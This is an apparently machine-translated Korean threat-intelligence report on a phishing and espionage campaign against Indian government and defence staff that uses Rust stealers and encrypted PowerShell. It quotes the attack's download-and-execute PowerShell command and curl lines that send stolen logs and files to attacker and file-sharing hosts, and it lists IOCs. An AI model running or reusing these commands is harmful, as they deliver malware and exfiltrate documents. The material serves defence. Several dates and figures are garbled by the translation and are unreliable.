Operation RusticWeb은 인도 정부를 표적으로 삼습니다. Rust 기반 맬웨어부터 웹 서비스 유출까지

SEQRITE Labs APT-Team은 2023년 10월부터 다양한 인도 정부 관계자를 대상으로 한 피싱 캠페인을 발견했습니다. 또한 12월에는 국방 분야의 정부 및 민간 기관을 대상으로 한 공격도 확인했습니다. 이 캠페인에서는 새로운 Rust 기반 페이로드와 암호화된 PowerShell 명령어를 사용하여 기밀 문서를 전용 명령 및 제어(C2) 서버가 아닌 웹 기반 서비스 엔진으로 유출했습니다. 공격자들은 공격 도구를 적극적으로 수정하면서 가짜 도메인을 이용하여 악성 페이로드와 미끼 파일을 호스팅하기도 했습니다. 아래는 이 캠페인에서 사용된 도메인 및 미끼 파일의 일부 예시입니다.

• 인사 및 훈련 부서의 IPR 양식(IAS 담당자 전용)
• 육군복지교육협회(AWES)를 모방한 가짜 도메인
• 카일라시 사티아르티 아동재단의 아삼 CDR 통계 보고서
• 정부 SSO 플랫폼인 Parichay를 모방한 또 다른 가짜 도메인
• 국방 서비스 장교 적립금(DSOP) 기금 추천서
• 국방부와의 분기별 이니셔티브 브리핑 발표

이 캠페인은 다음과 같이 추적됩니다. RusticWeb 작전, 여러 TTP가 파키스탄 관련 APT 그룹과 겹치는 경우 – 투명한 부족 (APT36) 및 사이드카피. 또한 Operation과 유사점이 있습니다. 갑옷 관통자 Cisco가 2021년에 발표한 보고서와 ESSA와의 타겟팅 장학금 신청서 AWES는 우리 팀에서 같은 해에 관찰되었습니다.

위협 행위자들은 잘 알려진 컴파일 언어에서 Golang, Rust, Nim과 같은 새로운 언어로 이동하기 시작했습니다. 이는 교차 호환성을 제공하는 동시에 탐지를 어렵게 만듭니다. 저희 팀이 분석한 최근 Golang 악성코드 사례는 다음과 같습니다. 비뚤어지다 악성 코드 생태계 C2로 Telegram 봇을 사용하고 Linux 기반 스테이저 페이로드를 사용합니다. 아레스 랫. 동시에 다양한 랜섬웨어(RaaS) 운영자는 메모리 안전성을 보장하는 동시에 고성능 암호화와 회피 속도를 제공하는 Rust로 이전했습니다.

감염 사슬 1

관찰된 첫 번째 감염은 파일 시스템 열거에 사용되는 Rust 기반 페이로드에 크게 의존합니다. 악성 바로가기 파일은 AWES의 가짜 도메인을 이용하여 이러한 페이로드를 유포하고 파일 공유 웹 서비스로 데이터를 유출하는 감염을 시작합니다.

그림 1 – 감염 사슬 (1)

공격자는 스피어 피싱을 통해 피해자를 표적으로 삼아 "라는 이름의 아카이브 파일을 생성합니다.IPR_2023-24”. 여기에는 이중 확장자 형식을 사용하는 PDF 파일로 위장한 Windows 바로 가기 파일이 포함되어 있습니다. 댓글 이름을 보면 해당 미끼가 지적재산권 관련 양식인 것으로 보입니다.

그림 2 – 악성 바로가기 파일

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep 바이패스 -nop -c “iwr 'hxxps://rb[.]gy/gbfsi' -OutFile $env:USERPROFILE\Documents\file.ps1; & $env:USERPROFILE\Documents\file.ps1”

이것을 열면 PowerShell이 ​​스크립트를 다운로드하고 실행합니다. rb[.]gy 도메인, 무료 URL 단축기. 프로필 없이 실행 정책을 우회하는 명령줄 매개변수는 Invoke-WebRequest를 사용하여 PS1 스크립트를 다운로드하는 데 사용됩니다.

피해자학

단축된 URL을 기반으로, 추적 도구를 사용하여 클릭 수와 클릭 발생 국가에 대한 통계를 확인할 수 있습니다. 캠페인은 26.53월 말에 시작되었으며, XNUMX월에는 많은 활동이 관찰되었으며, 그중 XNUMX%가 인도에서 발생했습니다. 이는 확인된 피해자를 반영하는 것은 아니지만, 표적 피해자에 대한 개요를 제공합니다.

그림 3 – 피해자학

PowerShell 스테이지

확장된 URL은 다음 도메인을 가리킵니다. awessscholarship[.]in PowerShell 스크립트를 가져와서 저장하려면 (파일.ps1) 인간을 서류 폴더입니다. 이 스크립트를 확인하기 전에 도메인 이름이 "육군 복지 교육 협회" 장학금처럼 보입니다. 이 단체의 합법적인 도메인은 다음과 같습니다. 장학금[.]awesindia[.]com, 과거에도 유사한 피싱 캠페인이 관찰된 적이 있습니다. 이 가짜 도메인 페이지를 열면 아래와 같이 공식 경고 알림이 표시된 공식 AWES 페이지로 리디렉션됩니다.

그림 4 – 가짜 웹사이트 공식 공지

PowerShell 스크립트는 유인 문서와 함께 후속 단계 페이로드를 다운로드하기 위한 URL 경로를 설정하는 것으로 시작합니다. 파일 다운로드 및 업로드를 위한 대상 경로가 설정되며, 해당 기능에 대한 세 가지 함수가 주로 정의됩니다.

그림 5 – PowerShell 스크립트

X와 Y 함수는 각각 파일에 메시지를 기록하고, 주어진 URL에서 대상 경로로 파일을 다운로드하여 기록하는 데 사용됩니다. 대상 위치는 기본값입니다. 서류 새 폴더가 있는 디렉토리 다운로드 미끼 PDF 파일과 폴더 옆에 보관 파일을 넣기 위해 만들어졌습니다.

그림 6 – PowerShell 스크립트(계속)

미끼가 열리면 확장자가 없는 단일 파일이 포함된 아카이브 파일이 추출됩니다. 이 파일의 이름을 EXE 확장자로 변경하고 실행합니다. 마지막으로 Z 함수를 사용하여 로그 파일을 서버에 업로드합니다. 컬 명령을 실행한 후 기록된 로그를 삭제합니다.

그림 7 – 업로드된 로그 파일

한편, 개설된 미끼 파일은 부동산 반환 신고서 양식으로, 신고서에는 '인도 행정 서비스'. 다양한 인도 정부 포털에서 유사한 양식이 여러 개 공개되어 있습니다. 하지만 이 빈 IPR 양식은 DoPT(인사훈련부)에서 제공됩니다. 웹 사이트 이는 인도 인사부 공공 민원 및 연금 담당 부서의 산하입니다. 육군 개인 지원서의 ESSA 교육 장학금 제도와는 아무런 관련이 없습니다.

그림 8 – 미끼: IAS 담당자를 위한 IPR 양식(23년 XNUMX월)

다운로더: 시스템 검사 단계

EXE 페이로드는 PDB 경로에서 발견되는 기본 시스템 정보를 확인하는 Rust로 컴파일된 바이너리로 밝혀졌습니다.syscheck.pdb'. IDA Pro 플러그인을 사용하여 Rust 함수 이름을 디맹글링(demangling)한 후, write 및 command execute 함수가 많이 호출되는 것을 볼 수 있습니다. 다음을 사용하여 정보를 검색합니다.

• 도메인 ifconfig[.]me IP 주소를 가져오려면
• 피해자 시스템에 있는 활성 드라이브를 가져오기 위한 WMIC 명령 – “wmic 논리 디스크 캡션 가져오기".

그림 9 – 시스템 검사 로그

이러한 로그는 '라는 파일에 기록됩니다.내 시스템.txt'에서 ProgramData\syscheck 디렉토리에 업로드되어 동일한 도메인에 업로드됨:

“curl -F TT=@C:\ProgramData\syscheck\MySystem.txt hxxps://awesscholarship[.in/upload/upload.php” 

그림 10 – 다음 단계를 다운로드할 URL

그런 다음 또 다른 아카이브가 명명되었습니다. 파일1.zip 동일한 가짜 도메인에서 다운로드되어 압축 해제됩니다. 이름이 'MySystem.exe'하고 처형되었습니다. 마지막으로, 고집 이 최종 페이로드는 시작 디렉토리를 통해 생성됩니다.

그림 11 – 시작을 통한 지속성

스틸러: 파이널 스테이지

최종 페이로드는 또 다른 Rust 기반 악성코드로, 파일을 훔치고 시스템 이름과 IP 주소를 수집하며 로그와 함께 개별 파일을 업로드합니다. 웹 브라우저, 디스코드/스팀, 암호화폐 지갑 등에서 정보를 훔치는 정교한 정보 탈취 기능은 내장되어 있지 않습니다. 이 캠페인에서는 9월부터 12월까지의 컴파일 타임스탬프를 가진 여러 버전의 이 악성코드가 발견되었으며, Virus Total에서 탐지율이 상당히 낮았습니다.

MD5	컴파일 타임스탬프	PDB
da745b60b5ef5b4881c6bc4b7a48d784	2023-09-26	syscheck.pdb
f68b17f1261aaa4460d759d95124fbd4	2023-09-26	알람.pdb
237961bbba6d4aa2e0fae720d4ece439	2023-10-26	알람.pdb
d2949a3c4496cb2b4d204b75e24390d9	2023-12-08	Zew.pdb
fc61b985d8c590860f397d943131bfb5	2023-12-11	Zew.pdb

91월과 XNUMX월 샘플에서 PDB 경로명의 변경 사항을 확인할 수 있지만 BinDiff를 통해 비교했을 때 유사성은 거의 동일하며 몇 가지 사소한 변경 사항을 제외하면 XNUMX%입니다.

그림 12 – 샘플의 유사성

다운로더 단계에서 이전에 가져온 모든 드라이브의 모든 문서 및 보관 파일을 나열합니다. 새 폴더 안에 서로 다른 이름의 로그 파일 두 개가 생성됩니다(마이크로, 파일) 각 샘플에 대해 경우 ProgramData 디렉토리입니다. 업로드된 파일의 레코드와 열거된 파일의 로그를 저장하는 데 사용됩니다. 열거된 파일을 '로그.txt,' 각 파일은 다음을 통해 업로드됩니다. 컬 PUT 메서드 오시[.]앗 도메인, 익명의 공개 파일 공유 엔진이라고 합니다. 오시업로드.

“curl -TC:\Users\test\Downloads\ .zip hxxps://oshi[.]at” 

데스크톱 이름과 함께 이러한 파일을 다운로드할 수 있는 링크가 '에 저장됩니다.기록.txt,각 파일에 대한 URL 세 개가 포함된 '입니다. 두 개는 Clearnet 링크로, 하나는 관리용이고 다른 하나는 다운로드용입니다. 세 번째는 Oshi의 Tor 도메인으로, 숨겨진 서비스를 통해 다운로드할 수 있습니다.

그림 13 – 업로드된 파일의 다운로드 링크

관리 페이지에는 업로드된 파일의 속성(다운로드 링크, 크기, 유형, 해시, 타임스탬프)이 표시됩니다. 파일 삭제 옵션과 만료 타이머도 제공됩니다.

그림 14 – 업로드된 파일 관리 페이지

파일 이름에 타임스탬프가 포함된 로그 파일이 가짜 AWES 도메인에 업로드됩니다. 서버 응답은 업로드 성공 여부를 확인한 후, 중단될 때까지 무한 대기 상태에 들어갑니다.

그림 15 – 로그 업로드 후 서버 응답

12월에 발견된 새로운 스틸러 페이로드를 통해, 위협 행위자는 카일라시 사티아르티 어린이 재단(Kailash Satyarthi Children's Foundation) 소유의 새로운 미끼 문서를 활용하고 있습니다. 해당 문서는 다음에서 확인할 수 있습니다. 웹 사이트이는 아삼 주의 "아동 결혼 및 아동에 대한 기타 범죄"에 대한 통계 보고서와 관련이 있습니다.

그림 16 – 미끼: 아삼 CDR(23년 XNUMX월)

군인 자녀와 IAS 장교를 대상으로 한 아동 재단이나 사회를 주제로 한 미끼를 스피어피싱 캠페인에 사용하는 것은 인도 정부 관료, 특히 아동 재단이나 사회와 관련된 사람들을 겨냥한 표적 공격임을 나타냅니다.

감염 사슬 2

12월에는 멀독(maldoc)을 이용한 유사한 감염 경로가 발견되었는데, Rust 기반 페이로드 대신 PowerShell 스크립트를 사용하여 열거 및 유출이 이루어졌습니다. 두 개의 가짜 도메인과 함께 암호화된 PowerShell 스크립트도 사용되었습니다.

그림 17 – 감염 사슬 (2)

감염은 악성 VBA 매크로가 포함된 피싱 악성 문서로 시작됩니다. 기본적인 VBA 난독화를 통해 암호화된 PowerShell 명령이 포함되어 있습니다. 약간 수정된 PS 명령을 사용하는 유사한 악성 문서도 발견되었습니다.

1. 디솝_놈.ppam
2. DSOP-NOM.ppam
3. PM_INDIG_INITIATIVE_BRIEF.ppam

그림 18 – 악성 VBA 매크로

암호화된 PowerShell

문서가 열리면 숫자가 '' 형태로 문자로 변환됩니다.파워쉘'. PowerShell 명령에는 암호화된 데이터가 포함되어 있으며, 이 데이터는 '를 사용하여 SecureString으로 변환됩니다.ConvertTo-SecureString' 키를 사용하여. 이는 PowerShell 암호 해독과 유사한 방식을 따릅니다. Emotet 하지만 약간 더 모호한 부분이 있습니다.

그림 19 – 암호화되고 난독화된 PowerShell 명령

첫 번째 maldoc에서 변환된 문자열은 다음을 사용합니다. 육군 원수 내장 DPAPI를 통해 복호화를 관리하기 위한 메모리 객체로 명령을 호출합니다. SecureStringToGlobalAllocUnicode 방법. 두 번째 방법은 PSCredentials 일반 텍스트 문자열을 가져오는 객체입니다. 마지막 객체에서는 PtrToStringBSTR   보안 문자열을 BSTR로 와 함께 사용됩니다 육군 원수 객체. 난독화를 위해 명령은 다음 기술을 사용합니다. Invoke-Obfuscation 환경 변수를 사용하여 IEX 명령의 트리거를 마스크하려면:

그림 20 – 난독화된 IEX 명령

완전히 복호화된 PowerShell 명령을 살펴보면, 디코이 파일과 다음 단계 PowerShell 스크립트가 다운로드됩니다. 이 파일들은 도메인에서 다운로드 서류 디렉토리에 저장하고 실행함.

그림 21 – 디코딩된 명령(1)

 

그림 22 – 디코딩된 명령(2)

도메인과 미끼

첫 번째 시나리오는 ' 도메인에서 다운로드합니다.파리차이.에파르[.]인,두 번째는 첫 번째 감염 경로에서 발견된 것과 동일한 AWES의 가짜 도메인을 사용합니다. 이 도메인은 악성 페이로드를 호스팅하는 데 사용되는 또 다른 가짜 도메인으로, 공식 정부 웹사이트를 모방하고 있습니다.파리차이.닉[.]인'. 단일 인증 프레임워크 하에 사용자를 등록하도록 설계된 정부 SSO 플랫폼입니다. Parichay는 "사용자 부서" 및 정부 이메일 주소(@nic.in/@gov.in)를 기반으로 공무원에게 다양한 NIC 서비스 접근 권한을 부여하는 반면, Jan Parichay는 시민에게 시민 중심 서비스 접근 권한을 부여합니다.

그림 23 – 합법적인 Parichay 도메인과 가짜 Parichay 도메인

첫 번째 미끼는 국방 회계부(Defence Accounts Department) 관련 DSOP(국방군 장교 공제 기금) 기금 추천서와 관련이 있습니다. 두 번째 미끼는 국방부에 제출하는 분기별 브리핑 자료에 대한 프레젠테이션과 관련이 있습니다.

그림 24 – 미끼: 국방 서비스 장교 예비금(DSOP) 기금

그림 25 – 미끼: 국방부

다음 단계 PowerShell 스크립트 '메일_체크.ps1'dropped'도 마찬가지로 암호화되고 난독화됩니다. 복호화된 스크립트를 살펴보면, 'syscheck.exe.' 이 페이로드의 지속성을 확립하기 위해 시작 폴더로 직접 추출됩니다.

그림 26 – 복호화 후 삭제된 PowerShell 스크립트

열거하고 빼내다

바이너리는 다른 PDB 이름을 가진 또 다른 Rust 기반 페이로드입니다. 'Aplet.pdb.' 컴파일러 타임스탬프는 14월 XNUMX일이고 Cisco의 이름이 있습니다. AnyConnect 웹 도우미 서명된 인증서와 함께.

그림 27 – WebHelper 인증서가 있는 바이너리

열거 및 추출을 직접 수행하는 대신 PowerShell 스크립트가 삭제됩니다.sys.ps1'로 영화 사용자 이름을 가져온 후 이 목적을 위해 디렉토리를 사용합니다. 실행된 명령은 다음과 같습니다.

“powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\test\Pictures\sys.ps1”

열거하는 동안 3개의 폴더가 제외됩니다. Windows 그리고 둘 다 '프로그램 파일' 디렉터리. 13개의 파일 유형('.ppt', '.pptx', '.pdf', '.xlsx', '.xlsm', '.xls', '.xlam', '.doc', '.docx', '.docm', '.txt', '.dot', '.ppam')만 선택되었으며 각 파일은 '경로.txt'에서 서류 폴더에 있습니다.

그림 28 – 열거 및 유출

업로드되면 오시[.]앗, 다운로드 URL은 '에 저장됩니다.suc_logs.txt' 캠페인 1과 유사합니다. 이 스크립트는 새 파일이 생성되었는지 확인하기 위해 무한 루프로 실행됩니다. 이 URL 로그는 특정 기간 후에 주기적으로 업로드됩니다.

 그림 29 – 로그 업로드

한편, 부모 바이너리(시스템 체크)는 중단되지 않는 한 무한 절전 모드로 전환됩니다. 중단되면 종료하는 대신 URL 로그를 Oshi에 다시 업로드합니다. 또한, 이번에는 백업 조치로 firebaseio의 하위 도메인에도 업로드합니다.

그림 30 – 인증을 사용하여 Firebaseio에 업로드

Firebase 실시간 데이터베이스는 실시간으로 데이터를 저장하고 동기화할 수 있는 클라우드 호스팅 NoSQL 데이터베이스입니다. Google에서 개발한 개방형 플랫폼으로, 개발자들이 클라우드 기반 애플리케이션에 널리 사용하고 있으며, 위협 행위자들이 악성코드를 배포하도록 유도하고 있습니다. 불운한 카므란 데이터를 유출하기 위한 것입니다. 클라우드 스토리지, 호스팅, 실시간 데이터베이스 등 다양한 기능을 제공합니다.

맺음말

새로운 피싱 캠페인이 인도 정부 관계자들을 표적으로 삼아 기밀 문서를 훔치고 있습니다. Rust 기반 페이로드와 암호화된 PowerShell 스크립트를 사용하여 문서를 열거하고 익명의 공개 파일 공유 엔진인 오시업로드 전용 명령 및 제어(C2) 서버 대신, 정부 기관을 모방한 두 가짜 도메인이 이 사이버 간첩 공격에서 악성 페이로드를 호스팅하는 데 사용되었습니다. RusticWeb 작전은 파키스탄 관련 여러 조직과 유사성을 공유하기 때문에 APT 위협과 연관될 가능성이 있습니다. 위협 행위자들이 Golang, Rust, Nim과 같은 새롭게 컴파일된 언어를 사용하여 개발된 악성코드로 전환함에 따라, 보안 유지를 위해 주의를 기울이고 필요한 예방 조치를 취할 것을 권장합니다.

SEQRITE 보호

• 링크.스틸러.48397
• PS.Steeller.48398
• RustStealer.48408.GC
• 스크립트.RustStealer.48409
• 트로이 목마.러스트스틸러

MITER ATT & CK

술책	기술 ID	이름
자원 개발	T1583.001 T1587.001 T1588.002 T1608.001 T1608.005	인프라 획득: 도메인 기능 개발: 맬웨어 능력 획득: 도구 단계 기능: 맬웨어 업로드 스테이지 기능: 링크 대상
초기 액세스	T1566.002	피싱: 스피어 피싱 링크
실행	T1106 T1129 T1059 T1047 T1204.002	네이티브 API 공유 모듈 명령 및 스크립팅 해석기 윈도우 관리 계장 사용자 실행: 악성 파일
고집	T1547.001	레지스트리 실행 키/시작 폴더
방어 회피	T1027.010 T1036.007 T1140	명령 난독화 가장: 이중 파일 확장자 파일 또는 정보의 난독화/디코드
발견	T1016 T1033 T1083	시스템 네트워크 구성 검색 시스템 소유자/사용자 검색 파일 및 디렉토리 검색
수집	T1005 T1119	로컬 시스템의 데이터 자동 수집
명령 및 제어	T1105	인그레스 도구 전송
여과	T1020 T1567	자동화된 유출 웹 서비스를 통한 유출

IOC

MD5	파일 이름
56cb95b63162d0dfceb30100ded1131a	IPR_2023-24.pdf.zip
13ee4bd10f05ee0499e18de68b3ea4d5	IPR_2023-24.pdf.lnk
de30abf093bd4dfe6b660079751951c6	DSOP-NOM.ppam
PowerShell을
c9969ece7bb47efac4b3b04cdc1538e5	in.ps1
f14e778f4d22df275c817ac3014873dc	In.ps1
501a6d48fd8f80a134cf71db3804cf95	메일_체크.ps1
6d29fc0a73096433ff9449c4bbc4cccc	sys.ps1
미끼
a9182c812c7f7d3e505677a57c8a353b	지적재산권.pdf
f5d8664cbf4a9e154d4a888e4384cb1d	abc009.pdf
3ce8dfb3f1bff805cb6b85a9e950b3a2	1.pdf
a696c50dd5d15ba75c9e7f8d3c64997c	1.pdf
아카이브
e0102071722a87f119b12434ae651b48
ee8d767069faf558886f1163a92e4009
9f3359ae571c247a8be28c0684678304
b0b6629d35451bcc511c0f2845934c3e
f2501e8b57486c427579eeda20b729fd
20b4eb5787faa00474f7d27c0fea1e4b
635864ff270cf8e366a7747fb5996766
EXE
da745b60b5ef5b4881c6bc4b7a48d784
f68b17f1261aaa4460d759d95124fbd4
237961bbba6d4aa2e0fae720d4ece439
d2949a3c4496cb2b4d204b75e24390d9
fc61b985d8c590860f397d943131bfb5
04557782d7017f18ec059fc96d7f2dc8
도메인/IP
awessscholarship[.]in 89.117.188[.]126
파리차이.에파르[.]인 13.232.102[.]189
오시[.]앗
alfa-aeafa-default-rtdb.firebaseio[.]com
URL이
hxxps://rb[.]gy/gbfsi
hxxps://awesscholarship[.]in/upload/file.zip
hxxps://awesscholarship[.]in/upload/file1.zip
hxxps://awesscholarship[.]in/upload/in.ps1
hxxps://awesscholarship[.]in/upload/upload.php
hxxps://awesscholarship[.]in/upload/Ipr.pdf
hxxps://awesscholarship[.]in/upload/abc009.pdf
hxxps://awesscholarship[.]in/upload/1.pdf
hxxps://awesscholarship[.]in/upload/DSOP-NOM.zip
hxxps://awesscholarship[.]in/ppam/Mail_Check.ps1
hxxps://awesscholarship[.]in/ppam/syscheck.zip
hxxps://parichay.epar[.]in/Win/1.pdf
hxxps://parichay.epar[.]in/Win/Mail_Check.ps1
PDB
C:\Users\123\Desktop\Syscheck\target\release\deps\syscheck.pdb
C:\Users\123\Desktop\Alam\target\release\deps\alam.pdb
C:\Users\123\Desktop\Aplet\target\release\deps\Aplet.pdb
D:\HOME\DESKTOP 새 데이터\Zew\대상\릴리스\deps\Zew.pdb
주인
C:\ProgramData\syscheck\file.zip
C:\ProgramData\syscheck\MySystem.exe
C:\ProgramData\syscheck\MySystem.txt
C:\ProgramData\Micro\logs.txt
C:\ProgramData\Micro\records.txt
C:\ProgramData\Files\Log.txt
C:\ProgramData\Files\Records.txt
문서\downloadAndExecuteLog.txt
문서\파일.ps1
문서\myfile.zip
문서\압축 해제된 폴더\file.exe
문서\다운로드\myfile.pdf
문서\경로.txt
문서\suc_logs.txt
문서\Mail_Check.ps1
문서\syscheck.zip
다운로드\1.pdf
그림\sys.ps1
%appdata%\Microsoft\Windows\시작 메뉴\프로그램\시작프로그램\MySystem.exe
%appdata%\Microsoft\Windows\시작 메뉴\프로그램\시작프로그램\syscheck.exe

저자: 사트윅 람 프라키